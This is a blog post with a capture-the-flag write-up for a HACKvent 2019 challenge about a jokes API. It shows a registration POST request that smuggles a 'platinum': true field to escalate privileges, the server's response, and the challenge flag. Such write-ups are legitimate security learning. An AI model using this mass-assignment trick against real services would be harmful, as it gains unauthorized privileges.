Sebastian's Blog

software developer. security enthusiast.

HACKVent 2019

HV19.11 Frolicsome Santa Jokes API

Sebastian
Challenge Description

The given API consists of three endpoints: /register, /login, /random. The workflow is the following:

  1. Register a user
  2. Login in and retrieve auth token
  3. Get random Joke using auth token

When creating a basic user, logging in and calling /random we would receive a JSON-Object containing the actual joke, the author of the joke and a flag called platinum, indicating if this flag was a platinum one or not. So I guess it is about receiving a platinum joke.

I thought, maybe I need to become platinum. I created another user using the following post request:

POST http://whale.hacking-lab.com:10101/fsja/register
{
  "username": "some_user2",
  "password": "passwordpassword",
  "platinum": true
}

After logging in and asking for a random joke we get:

{
"joke": "Congratulation! Sometimes bugs are rather stupid. But that's how it happens, sometimes. Doing all the crypto stuff right and forgetting the trivial stuff like input validation, Hohoho! Here's your flag: HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}",
"author": "Santa",
"platinum": true
}

That’s it! The flag is HV19{th3_cha1n_1s_0nly_as_str0ng_as_th3_w3ak3st_l1nk}.

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top